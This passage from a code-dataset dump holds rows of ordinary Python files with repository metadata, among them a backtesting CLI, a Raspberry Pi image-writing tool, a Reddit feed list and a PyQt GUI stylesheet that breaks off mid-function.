hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d32eef8a7dfcf28dbfc6929775c3f28b6adb0ef8 | 4,879 | py | Python | app/main.py | DataScienceHobbyGroup/nacho-b | e4cfc62f2daa45cb939bb544491cdb1c1a7294ef | [
"MIT"
] | null | null | null | app/main.py | DataScienceHobbyGroup/nacho-b | e4cfc62f2daa45cb939bb544491cdb1c1a7294ef | [
"MIT"
] | 1 | 2021-04-30T22:09:21.000Z | 2021-04-30T22:09:21.000Z | app/main.py | DataScienceHobbyGroup/nacho-b | e4cfc62f2daa45cb939bb544491cdb1c1a7294ef | [
"MIT"
] | null | null | null | """TODO: Add file description."""
import curio # async library
import logging # python standard logging library
import click # command line interface creation kit (click)
import click_log # connects the logger output to click output
from datasources.binance_csv import BinanceCSV
from datasources.binance_api import binance_api
from strategies.moving_average import moving_average
from strategies.dca import DCA
from exchanges.fake_exchange import FakeExchange
logging.basicConfig(
format='{asctime} - {name}: {levelname} $ {msg}',
style='{',
level=logging.INFO,
handlers=[
logging.FileHandler("last_run.log", mode='w'),
logging.StreamHandler()
]
)
logger = logging.getLogger(__name__)
click_log.basic_config(logger)
LOGO = '''
__ __
____ ____ ______/ /_ ____ / /_ ____ _____ ____ _____ ____ _
/ __ \/ __ `/ ___/ __ \/ __ \______/ __ \/ __ `/ __ \/ __ `/ __ \/ __ `/
/ / / / /_/ / /__/ / / / /_/ /_____/ /_/ / /_/ / / / / /_/ / / / / /_/ /
/_/ /_/\__,_/\___/_/ /_/\____/ /_.___/\__,_/_/ /_/\__,_/_/ /_/\__,_/
''' # noqa: E501, W291, W605
# These 3 dicts match the strings passed in to the command lines to the
# program modules. There is probably a cleaner/better way of acheiving
# this, but this works for now.
strategy_dict = {
"moving_average": moving_average,
"dca": DCA,
}
exchange_dict = {
"fake_exchange": FakeExchange,
}
datasource_dict = {
"binance_csv": BinanceCSV,
"binance_api": binance_api,
}
@click.command()
@click.option(
'--strategy',
help='Which strategy to use',
type=click.Choice(strategy_dict.keys(), case_sensitive=False)
)
@click.option(
'--strategy_params',
help='The parameters for the strategy, as a comma-separated list'
)
@click.option(
'--exchange',
help='Which exchange to use',
type=click.Choice(exchange_dict.keys())
)
@click.option(
'--datasource',
help='Which data source class to use',
type=click.Choice(list(datasource_dict.keys()))
)
@click.option(
'--datasource_path',
help='The path to the datasource csv or api endpoint',
type=click.Path(
exists=True,
file_okay=True,
dir_okay=False,
writable=False,
readable=True,
resolve_path=False,
allow_dash=True,
path_type=str
),
required=False
)
@click_log.simple_verbosity_option(logger)
def backtest(strategy, strategy_params, exchange, datasource, datasource_path):
"""TODO: Add description."""
if any(
[
strategy is None,
strategy_params is None,
exchange is None,
datasource is None
]
):
click.echo(
(
'Argument error. Run main.py backtest --help for info on the '
'arguments'
)
)
# We don't need to handle the case of these assignments failing because
# validaiton is handled for us by click
# TODO: --datasource_path is required for some strategies but not others
# - not sure how to get this working properly in click.
strategy_object = strategy_dict[strategy]
exchange_object = exchange_dict[exchange]
datasrce_object = datasource_dict[datasource]
from backtest import backtest_runner as bt
curio.run(
bt.run, strategy_object, exchange_object, datasrce_object,
strategy_params, datasource_path
)
# output_ddca = strategy_ddca.run('app/strategies/ddca.ini')
@click.command()
@click.option('--strategy', help='Which strategy to use')
@click.option(
'--strategy_params',
help='The parameters for the strategy, as a comma-separated list'
)
@click.option('--exchange', help='Which exchange to use')
@click.option('--datasource', help='Which data source class to use')
def connect_to_api(strategy, strategy_params, exchange, datasource):
"""TODO: Add description."""
logger.info((
"This is where in the future we will connect to a live api and run "
"the strategy indefinitely."
))
@click.command()
@click.option('--strategy', help='Which strategy to use')
@click.option('--datasource', help='Which data source class to use')
@click.option(
'--datasource_path',
help='The path to the datasource csv (if applicable)'
)
def optimise(strategy, datasource, datasource_path):
"""TODO: Add description."""
logger.info((
"This is where in the future we will run a training algorithm to "
"optimise the params of the strategy"
))
# Register the CLI commands
@click.group()
def cli():
"""TODO: Add description."""
pass
cli.add_command(backtest)
cli.add_command(connect_to_api)
cli.add_command(optimise)
# Entrypoint
if __name__ == '__main__':
logger.info(LOGO)
cli()
| 29.215569 | 79 | 0.644189 | 0 | 0 | 0 | 0 | 3,072 | 0.629637 | 0 | 0 | 2,207 | 0.452347 |
d32efdf87fa01cecf781b9df68da523858dc7395 | 446 | py | Python | github/joeynmt/vizseq/__init__.py | shania3322/joeynmt | 5afe9d00930f19949b2078141771bf4621f6e9ae | [
"Apache-2.0"
] | null | null | null | github/joeynmt/vizseq/__init__.py | shania3322/joeynmt | 5afe9d00930f19949b2078141771bf4621f6e9ae | [
"Apache-2.0"
] | null | null | null | github/joeynmt/vizseq/__init__.py | shania3322/joeynmt | 5afe9d00930f19949b2078141771bf4621f6e9ae | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import os.path as op
from pathlib import Path
FILE_ROOT = Path(__file__).parent
with open(op.join(FILE_ROOT, 'VERSION')) as f:
__version__ = f.read()
from vizseq.ipynb import *
from vizseq.ipynb import fairseq_viz as fairseq
| 26.235294 | 62 | 0.724215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 207 | 0.464126 |
d32f5b9d04aa58bad6be7d58f09474c29bae63fc | 428 | py | Python | invest_app/investlib/yfhelper.py | bdastur/builder | e05c013d01c4e82340879289940b3029fc6de266 | [
"Apache-2.0"
] | null | null | null | invest_app/investlib/yfhelper.py | bdastur/builder | e05c013d01c4e82340879289940b3029fc6de266 | [
"Apache-2.0"
] | null | null | null | invest_app/investlib/yfhelper.py | bdastur/builder | e05c013d01c4e82340879289940b3029fc6de266 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import yahoofinancials
def get_historical_price_data(ticker_symbol,
start_date, end_date,
frequency='weekly'):
'''
The API returns historical price data.
'''
yf = yahoofinancials.YahooFinancials(ticker_symbol)
data = yf.get_historical_price_data(start_date, end_date, frequency)
return data
| 22.526316 | 72 | 0.619159 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.247664 |
d32f8561b61fe41f696c13c35bb0725c59749044 | 601 | py | Python | tools/HGMD/access_HGMDdb.py | NickyPan/bio_informatics | 2542b2888f6bdf684727622fbe9e073bc2ef61c8 | [
"Apache-2.0"
] | 1 | 2019-02-28T05:17:00.000Z | 2019-02-28T05:17:00.000Z | tools/HGMD/access_HGMDdb.py | NickyPan/bio_informatics | 2542b2888f6bdf684727622fbe9e073bc2ef61c8 | [
"Apache-2.0"
] | null | null | null | tools/HGMD/access_HGMDdb.py | NickyPan/bio_informatics | 2542b2888f6bdf684727622fbe9e073bc2ef61c8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import sys
dbSet = []
with open('other_allmut_HD.txt',"r") as beds:
for bed in beds:
bed = bed.strip()
bed = bed.split('\t')
item = bed[15] + '\t' + bed[16] + '\t' + bed[17] + '\t' + bed[17] + '\t' + bed[17] + '\t' + bed[17] + '\t' + 'https://www.ncbi.nlm.nih.gov/pubmed/' + bed[26] + '\t' + bed[18] + '\t' + bed[17] + '\t' + bed[1] + '\t' + bed[13] + '\t' + bed[11] + '\t' + bed[14] + '\t' + bed[0]
dbSet.append(item)
beds.close()
result = '\n'.join(dbSet)
with open('dbset.txt', "w") as text_file:
text_file.write(result) | 37.5625 | 282 | 0.507488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 157 | 0.261231 |
d32fadd4ff7f6437fb1ebe111930355e7c14cd81 | 5,058 | py | Python | home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py | erick-guerra/Royalbox | 967dbbdddc94b9968e6eba873f0d20328fd86f66 | [
"MIT"
] | 1 | 2022-01-29T11:17:58.000Z | 2022-01-29T11:17:58.000Z | home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py | erick-guerra/Royalbox | 967dbbdddc94b9968e6eba873f0d20328fd86f66 | [
"MIT"
] | null | null | null | home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py | erick-guerra/Royalbox | 967dbbdddc94b9968e6eba873f0d20328fd86f66 | [
"MIT"
] | null | null | null | import chanutils.reddit
_SUBREDDIT = 'Documentaries'
_FEEDLIST = [
{'title':'Latest', 'url':'http://www.reddit.com/r/Documentaries.json'},
{'title':'Anthropology', 'url':'http://www.reddit.com/r/documentaries/search.json?q=flair%3A%27Anthropology%27&sort=top&restrict_sr=on&t=all'},
{'title':'Art', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Art%27&sort=top&restrict_sr=on&t=all'},
{'title':'Biography', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Biography%27&sort=top&restrict_sr=on&t=all'},
{'title':'Crime', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Crime%27&sort=top&restrict_sr=on&t=all'},
{'title':'Cusine', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Cuisine%27&sort=top&restrict_sr=on&t=all'},
{'title':'Disaster', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Disaster%27&sort=top&restrict_sr=on&t=all'},
{'title':'Drugs', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Drugs%27&sort=top&restrict_sr=on&t=all'},
{'title':'Economics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Economics%27&sort=top&restrict_sr=on&t=all'},
{'title':'History', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27History%27&sort=top&restrict_sr=on&t=all'},
{'title':'History (Ancient)', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Ancient+hist%27&sort=top&restrict_sr=on&t=all'},
{'title':'History (20th Century)', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%2720th+century%27&sort=top&restrict_sr=on&t=all'},
{'title':'Intelligence', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Intelligence%27&sort=top&restrict_sr=on&t=all'},
{'title':'Literature', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Literature%27&sort=top&restrict_sr=on&t=all'},
{'title':'Medicine', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Medicine%27&sort=top&restrict_sr=on&t=all'},
{'title':'Music', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Music%27&sort=top&restrict_sr=on&t=all'},
{'title':'Nature', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Nature%27&sort=top&restrict_sr=on&t=all'},
{'title':'Offbeat', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Offbeat%27&sort=top&restrict_sr=on&t=all'},
{'title':'American Politics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27American+politics%27&sort=top&restrict_sr=on&t=all'},
{'title':'International Politics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Int+politics%27&sort=top&restrict_sr=on&t=all'},
{'title':'Psychology', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Psychology%27&sort=top&restrict_sr=on&t=all'},
{'title':'Religion', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Religion%27&sort=top&restrict_sr=on&t=all'},
{'title':'Science', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Science%27&sort=top&restrict_sr=on&t=all'},
{'title':'Sex', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Sex%27&sort=top&restrict_sr=on&t=all'},
{'title':'Sport', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Sport%27&sort=top&restrict_sr=on&t=all'},
{'title':'Tech/Internet', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Tech%27&sort=top&restrict_sr=on&t=all'},
{'title':'Travel', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Travel%27&sort=top&restrict_sr=on&t=all'},
{'title':'War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27War%27&sort=top&restrict_sr=on&t=all'},
{'title':'World War 1', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27WW1%27&sort=top&restrict_sr=on&t=all'},
{'title':'World War 2', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27WW2%27&sort=top&restrict_sr=on&t=all'},
{'title':'Vietnam War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Vietnam+conflict%27&sort=top&restrict_sr=on&t=all'},
{'title':'Afghanistan War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Afghanistan+conflict%27&sort=top&restrict_sr=on&t=all'},
{'title':'Iraq War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Iraq+conflict%27&sort=top&restrict_sr=on&t=all'},
]
def name():
return 'Documentaries'
def image():
return "icon.png"
def description():
return "Assorted Documentaries Channel for /r/Documentaries subreddit (<a target='_blank' href='http://www.reddit.com/r/Documentaries'>http://www.reddit.com/r/Documentaries</a>)."
def feedlist():
return _FEEDLIST
def feed(idx):
return chanutils.reddit.get_feed(_FEEDLIST[idx])
def search(q):
return chanutils.reddit.search(_SUBREDDIT, q)
| 87.206897 | 181 | 0.723013 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,428 | 0.875445 |
d330b0abc9b07d9ac27539db5194ff38a79da742 | 73 | py | Python | python/__init__.py | SpM-lab/irbasis | 5beb5cbe3c0ba0fb42c32e262f04d1f3359d6045 | [
"MIT"
] | 17 | 2018-07-16T15:07:09.000Z | 2022-03-26T06:46:55.000Z | python/__init__.py | SpM-lab/irbasis | 5beb5cbe3c0ba0fb42c32e262f04d1f3359d6045 | [
"MIT"
] | 3 | 2019-09-19T07:12:01.000Z | 2020-02-14T11:54:03.000Z | python/__init__.py | SpM-lab/irbasis | 5beb5cbe3c0ba0fb42c32e262f04d1f3359d6045 | [
"MIT"
] | 6 | 2019-01-28T19:51:50.000Z | 2021-08-02T12:57:14.000Z | from .irbasis import load, basis, sampling_points_matsubara, __version__
| 36.5 | 72 | 0.849315 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d331cf8fdbde34709011fa6dbc66e215380c30c3 | 4,650 | py | Python | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | import sys
import traceback
import click
from . import imaging_utility as iu
from . import provisioning
from . import __version__
def eprint(msg, show):
if show:
traceback.print_exc()
print(file=sys.stderr)
click.echo(msg, file=sys.stderr)
@click.group()
@click.version_option(__version__)
@click.option('--traceback', is_flag=True,
help='Show the full python exception if an error occurs.')
@click.pass_context
def cli(ctx, traceback):
ctx.ensure_object(dict)
ctx.obj['TRACEBACK'] = traceback
@cli.command()
@click.option('--hidden/--plain', default=True,
help='Hide or show password input.')
@click.pass_context
def create(ctx, hidden):
"""Create a provisioning configuration."""
try:
provisioning.create(hidden)
except Exception as exc:
eprint(f'Creating provisioning configuration failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('os')
@click.option('--image-cache',
type=click.Path(file_okay=False),
default='~/.cache/bake-a-py',
help='Path where the downloaded image is stored.')
@click.option('-o', '--output',
help='Device path to write the OS image to.')
@click.option('--chksum/--no-chksum', '-c/ ', default=False,
help='Check the checksum of the OS image before writing.')
@click.option('--target', '-t',
help='Name of the configuration file.')
@click.option('--become', '-b', is_flag=True,
help='Run the writing of the image as super user.')
@click.option('--remove', '-r', is_flag=True,
help='Remove the image file after writing.')
@click.option('--keep', '-k', is_flag=True,
help='Keep the downloaded archive.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def write(ctx, os, image_cache, output, chksum, target, become, remove, keep,
encrypted):
"""Write the image.
OS is the image name (one of the results of the list command).
This command download, extracts, checks integrity, writes and provisions
if neccessary.
"""
try:
iu.write(os, image_cache, output, target, chksum, become, remove, keep,
encrypted)
except Exception as exc:
eprint(f'Writing failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('target')
@click.option('-o', '--output',
help='Device path to write the OS image to.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def provision(ctx, target, output, encrypted):
"""Provision the os on OUTPUT for TARGET.
TARGET is the name of the configuration file.
"""
try:
iu.provision(target, output, encrypted)
except Exception as exc:
eprint(f'Provisioning failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def mount(ctx, device):
"""Mount all partitions on DEVICE."""
try:
iu.udisks2.mount(device)
except Exception as exc:
eprint(f'Mounting {device} failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def unmount(ctx, device):
"""Unmount all partitions on DEVICE."""
try:
iu.udisks2.unmount(device)
except Exception as exc:
eprint(f'Unmounting {device} failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.option('-a', '--all', is_flag=True,
help='All available images (not only Raspberry Pi OS images).')
@click.pass_context
def list(ctx, all):
"""List available OS images."""
try:
if all:
result = iu.get_all_images()
else:
result = iu.get_raspios_flavors()
click.echo('\n'.join(result))
except Exception as exc:
eprint(f'Listing OS images failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.option('--verbose', '-v', is_flag=True,
help='Show the complete description of the os image.')
@click.argument('name')
@click.pass_context
def describe(ctx, name, verbose):
"""Display the description of the OS image NAME.
"""
try:
desc = iu.get_image_description(name)
if verbose:
click.echo(desc)
else:
click.echo(desc['description'])
except Exception as exc:
eprint(f'Displaying description of {name} failed ({exc}).',
ctx.obj['TRACEBACK'])
if __name__ == '__main__':
cli(obj={}) | 31 | 79 | 0.641505 | 0 | 0 | 0 | 0 | 4,324 | 0.929892 | 0 | 0 | 1,831 | 0.393763 |
d331d81afce0ba8cb722312a7186ad3036859de6 | 1,338 | py | Python | utility/gd_content.py | SoftBlankie/dsa-twitter-bot | 9d251ab0e3a89b38696bf667421eba0f49923033 | [
"MIT",
"Unlicense"
] | null | null | null | utility/gd_content.py | SoftBlankie/dsa-twitter-bot | 9d251ab0e3a89b38696bf667421eba0f49923033 | [
"MIT",
"Unlicense"
] | null | null | null | utility/gd_content.py | SoftBlankie/dsa-twitter-bot | 9d251ab0e3a89b38696bf667421eba0f49923033 | [
"MIT",
"Unlicense"
] | null | null | null | def read_paragraph_element(element):
"""Returns text in given ParagraphElement
Args:
element: ParagraphElement from Google Doc
"""
text_run = element.get('textRun')
if not text_run:
return ''
return text_run.get('content')
def read_structural_elements(elements):
"""Recurses through list of Structural Elements to read document's
text where text may be in nested elements
Args:
elements: list of Structural Elements.
"""
text = ''
for value in elements:
if 'paragraph' in value:
elements = value.get('paragraph').get('elements')
for elem in elements:
text += read_paragraph_element(elem)
elif 'table' in value:
# text in table cells are in nested Structural Elements
# and tables may be nested
table = value.get('table')
for row in table.get('tableRows'):
cells = row.get('tableCells')
for cell in cells:
text += read_strucutural_elements(cell.get('content'))
elif 'tableOfContents' in value:
# text in TOC is also in Structural Element.
toc = value.get('tableOfContents')
text += read_strucutural_elements(toc.get('content'))
return text
| 35.210526 | 74 | 0.594918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 576 | 0.430493 |
d33381d94db212c012354ecf16f4b8a33084a29c | 301 | py | Python | SchoolManagement/ServerRestAPI/admin.py | amiremohamadi/django-restful-api | 13dd5de4f16b5529556118a3469680c42e6e8c42 | [
"MIT"
] | 4 | 2019-05-26T18:08:44.000Z | 2019-07-05T10:45:24.000Z | SchoolManagement/ServerRestAPI/admin.py | amiremohamadi/django-restful-api | 13dd5de4f16b5529556118a3469680c42e6e8c42 | [
"MIT"
] | null | null | null | SchoolManagement/ServerRestAPI/admin.py | amiremohamadi/django-restful-api | 13dd5de4f16b5529556118a3469680c42e6e8c42 | [
"MIT"
] | 2 | 2020-05-31T20:38:59.000Z | 2020-10-07T11:16:52.000Z | from django.contrib import admin
from ServerRestAPI.models import (
Student, Teacher, StudentLecture,
TeacherLecture, Lecture
)
admin.site.register(Student)
admin.site.register(Teacher)
admin.site.register(StudentLecture)
admin.site.register(TeacherLecture)
admin.site.register(Lecture) | 25.083333 | 38 | 0.797342 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d33385aee0f5219d0cc15a664efa5cd3ff7a8758 | 352 | py | Python | BOJ/17000~17999/17200~17299/17286.py | shinkeonkim/today-ps | f3e5e38c5215f19579bb0422f303a9c18c626afa | [
"Apache-2.0"
] | 2 | 2020-01-29T06:54:41.000Z | 2021-11-07T13:23:27.000Z | BOJ/17000~17999/17200~17299/17286.py | shinkeonkim/Today_PS | bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44 | [
"Apache-2.0"
] | null | null | null | BOJ/17000~17999/17200~17299/17286.py | shinkeonkim/Today_PS | bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44 | [
"Apache-2.0"
] | null | null | null | import itertools,math
L = [1,2,3]
p = list(itertools.permutations(L,3))
D = [list(map(int,input().split())) for i in range(4)]
ans = 999999999999
for pp in p:
k = [0]+list(pp)
d = 0
for i in range(1,4):
d += math.sqrt((D[k[i-1]][0] - D[k[i]][0])**2 + (D[k[i-1]][1] - D[k[i]][1])**2)
if d < ans:
ans = d
print(int(ans)) | 23.466667 | 87 | 0.511364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d3356a95eb136cde9fb2ff5f5c78c32c6a43c33c | 7,264 | py | Python | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | 1 | 2022-03-04T01:55:40.000Z | 2022-03-04T01:55:40.000Z | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | null | null | null | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'cellPoseUI.ui'
# Created by: PyQt5 UI code generator 5.11.3
import os, platform, ctypes, sys
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFontDatabase
from scellseg.guis.scellsegUi import Ui_MainWindow
class scellsegGui(Ui_MainWindow):
def __init__(self, image=None, parent = None):
super(scellsegGui, self).__init__(parent)
self.setupUi(self)
self.splitter.setSizes([500, 250])
self.splitter.handle(1).setAttribute(Qt.WA_Hover, True)
self.splitter2.handle(1).setAttribute(Qt.WA_Hover, True)
def closeEvent(self, event):
answer = QtWidgets.QMessageBox.question(self, 'Close', 'Close Scellseg',
QtWidgets.QMessageBox.Yes |
QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No)
if answer == QtWidgets.QMessageBox.Yes:
event.accept()
elif answer == QtWidgets.QMessageBox.No:
event.ignore()
def start_gui():
Translucent = 'rgba(255,255,255,0)'
Primary = '#fafafa'
PrimaryLight = '#C0C0C0'
ListColor = '#F0F0F0'
SliderColor = '#0078D7'
LabelColor = '#7A581E'
BlackColor = '#000000'
BtnColor = '#0066FF'
Secondary = '#D3D3D3'
SecondaryLight = '#D3D3D3'
SecondaryDark = '#D3D3D3'
SecondaryText = '#000000'
border_image_path = os.path.dirname(os.path.abspath(__file__)).replace('\\', '/') + '/assets/slider_handle.png'
sheet = [
'QWidget',
'{',
'outline: 0;',
'font: 11pt "文泉驿微米黑";',
'selection-color: {0:s};'.format(SecondaryText),
'selection-background-color: {0:s};'.format(Secondary),
' } ',
'QSlider::handle:horizontal#rangeslider'
'{',
'border-image: url({0:s});'.format(border_image_path),
'}',
'QLabel#label_seg',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QLabel#label_batchseg',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QLabel#label_getsingle',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QSplitter::handle:horizontal',
'{',
'width: 10px;',
'}',
'QSplitter::handle:vertical',
'{',
'height: 10px;',
'}',
'QSplitter::handle',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QSplitter::handle:hover',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QSplitter::handle:pressed',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QTableView',
'{',
'background-color: {0:s};'.format(ListColor),
'border-style: none;',
'}',
'QHeaderView',
'{',
'background-color: {0:s};'.format(Translucent),
'border-bottom: 2px solid #505050',
'}',
'QHeaderView::section',
'{',
'background-color: {0:s};'.format(Translucent),
'border-bottom: 2px solid #505050',
'}',
'QMenuBar',
'{',
'background-color: {0:s};'.format(Primary),
'border-width: 1px;',
'border-style: none;',
'border-color: {0:s};'.format(SecondaryDark),
'color: {0:s};'.format(SecondaryText),
'margin: 0px;',
'}',
'QMenuBar::item:selected',
'{',
'background-color: {0:s};'.format(Secondary),
'color: {0:s};'.format(SecondaryText),
'}',
'QMenu',
'{',
'background-color:{0:s};'.format(PrimaryLight),
'border-width: 2px;',
'border-style: solid;',
'border-color: {0:s};'.format(SecondaryDark),
'margin: 0px;',
'}',
'QMenu::separator'
'{',
'height: 2px;'
'background-color: {0:s};'.format(Primary),
'margin: 0px 2px;',
'}',
'QMenu::icon:checked',
'{',
'background-color: {0:s};'.format(Secondary),
'border-width: 1px;',
'border-style: solid;',
'border-color: {0:s};'.format(Primary),
'}',
'QMenu::item',
'{',
'padding: 4px 25px 4px 20px;',
'}',
'QMenu::item:selected',
'{',
'background-color: {0:s};'.format(Secondary),
'color: {0:s};'.format(SecondaryText),
'}',
'QToolBox::tab',
'{',
'background-color: {0:s};'.format(SecondaryLight),
'border: 2px solid #e3e3e3;',
'padding: 5px;',
'}',
'QToolBox::tab:selected',
'{',
'background-color: {0:s};'.format(SecondaryDark),
'color: {0:s};'.format(SecondaryText),
'border: 2px solid #333;',
'}',
'QWidget#page,QWidget#page_2,QWidget#page_3',
'{',
'backgroundcolor:#F0F0F0;',
# 'background-image: url(./assets/background.jpg);',
'}',
'QProgressBar {',
'border: 1px solid rgb(0,0,0);',
'border-radius: 2px;',
'background-color: {0:s};'.format(SecondaryLight),
'}',
'QProgressBar::chunk {',
'border: 1px solid rgb(0,0,0);',
'border-radius: 0px;',
'background-color: {0:s};'.format(SecondaryDark),
'width: 10px;',
'margin: 2px;',
'}',
'QLabel#jLabelPicture',
'{',
'border-width: 2px;',
'border-radius: 0px;',
'border-style: solid;',
'border-color: {0:s};'.format(SecondaryDark),
'}',
'QScrollBar,QScrollBar::add-line,QScrollBar::add-page,QScrollBar::sub-line,QScrollBar::sub-page',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QScrollBar:horizontal',
'{',
'height: 10px;',
'}',
'QScrollBar:vertical',
'{',
'width: 10px;',
'}',
'QScrollBar::handle',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QScrollBar::handle:hover',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QScrollBar::handle:pressed',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
]
app = QtWidgets.QApplication(sys.argv)
loadedFontID = QFontDatabase.addApplicationFont(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets", "Font", "wqy-microhei.ttc"))
print('operating system: ', platform.system())
if platform.system() == 'Windows':
